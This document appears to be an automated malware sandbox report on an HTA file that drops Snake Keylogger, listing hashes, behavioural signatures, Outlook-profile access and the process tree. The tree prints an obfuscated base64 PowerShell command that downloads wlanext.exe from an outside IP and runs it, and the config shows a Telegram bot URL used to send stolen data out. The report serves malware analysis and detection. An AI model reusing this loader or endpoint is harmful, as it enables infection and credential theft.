Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 06:06
Static task
static1
Behavioral task
behavioral1
Sample
seethemagicalpersoninmylifewithherlifegoodforme.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
seethemagicalpersoninmylifewithherlifegoodforme.hta
Resource
win10v2004-20241007-en
General
-
Target
seethemagicalpersoninmylifewithherlifegoodforme.hta
-
Size
130KB
-
MD5
42ad4924ceb9f99d1a69af070b9952b9
-
SHA1
00b53af05220b7e3216a9ef64805feddcc82c729
-
SHA256
a83ac36314853f773e848c63c40aafe74029cca2ab364fee41b15486e267e6c9
-
SHA512
688796c131f863fa8dbe67e66167d18997561c61205062bc50e5d14b2f3e1b45614a6d04d0f0eb83029151577ae7494509f69eb038eb79fe50986d1e74cea1b2
-
SSDEEP
96:Eam77w29ir9w29i3ADFXhAfVVXoPw29i+w29ii2Jw29ihc7T:Ea278r983YXhAteP8+8i2J8hiT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot8129252196:AAFb_vUYwennKVolbwpXf3vnDfT_yhozHns/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/736-91-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 2524 pOWeRSHEll.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 4688 powershell.exe 2524 pOWeRSHEll.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 2996 wlanext.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000d000000023b3a-75.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2996 set thread context of 736 2996 wlanext.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSHEll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2524 pOWeRSHEll.exe 2524 pOWeRSHEll.exe 4688 powershell.exe 4688 powershell.exe 736 RegSvcs.exe 736 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2996 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2524 pOWeRSHEll.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 736 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2996 wlanext.exe 2996 wlanext.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2996 wlanext.exe 2996 wlanext.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 1072 wrote to memory of 2524 1072 mshta.exe 85 PID 1072 wrote to memory of 2524 1072 mshta.exe 85 PID 1072 wrote to memory of 2524 1072 mshta.exe 85 PID 2524 wrote to memory of 4688 2524 pOWeRSHEll.exe 89 PID 2524 wrote to memory of 4688 2524 pOWeRSHEll.exe 89 PID 2524 wrote to memory of 4688 2524 pOWeRSHEll.exe 89 PID 2524 wrote to memory of 1344 2524 pOWeRSHEll.exe 94 PID 2524 wrote to memory of 1344 2524 pOWeRSHEll.exe 94 PID 2524 wrote to memory of 1344 2524 pOWeRSHEll.exe 94 PID 1344 wrote to memory of 2716 1344 csc.exe 95 PID 1344 wrote to memory of 2716 1344 csc.exe 95 PID 1344 wrote to memory of 2716 1344 csc.exe 95 PID 2524 wrote to memory of 2996 2524 pOWeRSHEll.exe 99 PID 2524 wrote to memory of 2996 2524 pOWeRSHEll.exe 99 PID 2524 wrote to memory of 2996 2524 pOWeRSHEll.exe 99 PID 2996 wrote to memory of 736 2996 wlanext.exe 100 PID 2996 wrote to memory of 736 2996 wlanext.exe 100 PID 2996 wrote to memory of 736 2996 wlanext.exe 100 PID 2996 wrote to memory of 736 2996 wlanext.exe 100 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethemagicalpersoninmylifewithherlifegoodforme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe"C:\Windows\systEm32\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe" "poweRshELl.ExE -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt ; IEx($(IeX('[sysTEM.TExT.eNcODiNG]'+[CHAr]58+[cHAr]58+'utf8.GEtStrIng([sYStEM.CONVert]'+[cHaR]58+[ChAR]58+'FRoMBASE64stRiNG('+[chaR]0X22+'JHpWV21LICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlZklOaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVJdEd0RkxyayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlPaGNCWkMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnRFl3bFBXUURDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp1UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3Z05LQ3FQWk8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3RhaHNQek92IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hrSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpWV21LOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTYxL3dsYW5leHQuZXhlIiwiJEVuVjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3N0QVJ0LVNsRWVQKDMpO3NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kdgnf5xf\kdgnf5xf.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC851.tmp" "c:\Users\Admin\AppData\Local\Temp\kdgnf5xf\CSCDF116EA364DC475680F478B4EAF7195.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:736
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5827bcc25735d26b181654861c655e703
SHA1fff1f4d7dd4d19b7075383d5dcc94ba49f4b7119
SHA256e574521c0978673e10115b5d1236cfeab28a1caa3276d73bbe1b0fe4208b66c1
SHA5122309fb7e0cab36b1e5808435449b8b7fc5be696fdedacdb6c530e93e3e1f44a6103261c38faec3d5df99d75697d34199ab35817a909b073fb41319b90133a9a0
-
Filesize
1KB
MD522ad1f103a57de93c3b58cbf892ac14a
SHA1e63488f874217715a2c14ea540666445c4b919fd
SHA256fba0c39b183704d543704dd1bc484f0e84b34dc572ad2214f38a67035ece45ad
SHA5123632217d734f66928d4d971acefa180ebb889dfef4547bc94a018ab4a207c0df00be3283c86296a56a3910306f623bc8b5826b47d17c7c142e5a5785ff6aebc2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5e75c21c7238df0aef4524d6d3f62162a
SHA145f46238dc24237fcfb6b957e2a2a3ac09ea0e8e
SHA2568d2d75ea2c5fc70f55993242614c05ac5a9f3b549898891c41155578ca932d22
SHA512a755fabcd9d8412459990ef208acb3b665c6b50275d5499d5ba953bb9e72669cc93f0e3e866b4841a29c258244ff7ef18e6065a1297accf9a085a4e27a3d860f
-
Filesize
910KB
MD5d70ae089068975f5c914ba70c40c3527
SHA1b0a81c280689f14bfa4d499955c80155e045e662
SHA2562385bc1316c82968a13b95bb465c19f7675a6d3504fc3b8c028c00d7acbdc022
SHA512532dd387f2a6757185aa6da0983d71277c2a7d9774482f27ba6d55478a7035df8b911457523569151be68e45ca6ee0e3a1f3cbff1eaab7d8126454a204532697
-
Filesize
652B
MD56a5a0b004cbb5111116d5ecbd3f99504
SHA121e1dde6c4bfd82dff89a4e41ecc2c1a6c55bbf1
SHA256ac7569586b854d14cf6f2abe65bc9ef3b14c4b87f1f76f5553685c6d265f4d24
SHA512bc36ede661f5e5fcac12b39426d0772a0f19a7e7e064ce53925505a6503647be253f989c9f9675d1066739df0e42d7c125fbd7905c57a50eefb7439cc7cb3b5e
-
Filesize
483B
MD54c5d6a51b5bad9b89090a128b2676ef5
SHA113fbf9031d31d7c621c9fa9816818b341377d487
SHA256c849809f9d06a8ef3bbd4de89bc706fbd851231f8dfe9f8ed84800c9b67e80d7
SHA512a3f1573cee336b8efe076e8746e5a61e73d46b539cb5170f297262a5327e7b43e0c45cfe93682e93b92f20e878ae9e21e60502dbcdf492236ea642f15290601d
-
Filesize
369B
MD58842520ca50d112d21d84a9a3c134565
SHA1f30020530aae109e80be420c226a79fcdd12865e
SHA25696a2786fb9f8526c5ae09c2419f8a7bb993b2ecec037bb37c5dadaf5dee24960
SHA5128e802f33e36721abf54cd299866642d2027bf63a9b05fc1bf1f32490008bf3b448be32f0daac188b35a5bbc00eacf92477a5430058c19aa52e78e633a5545290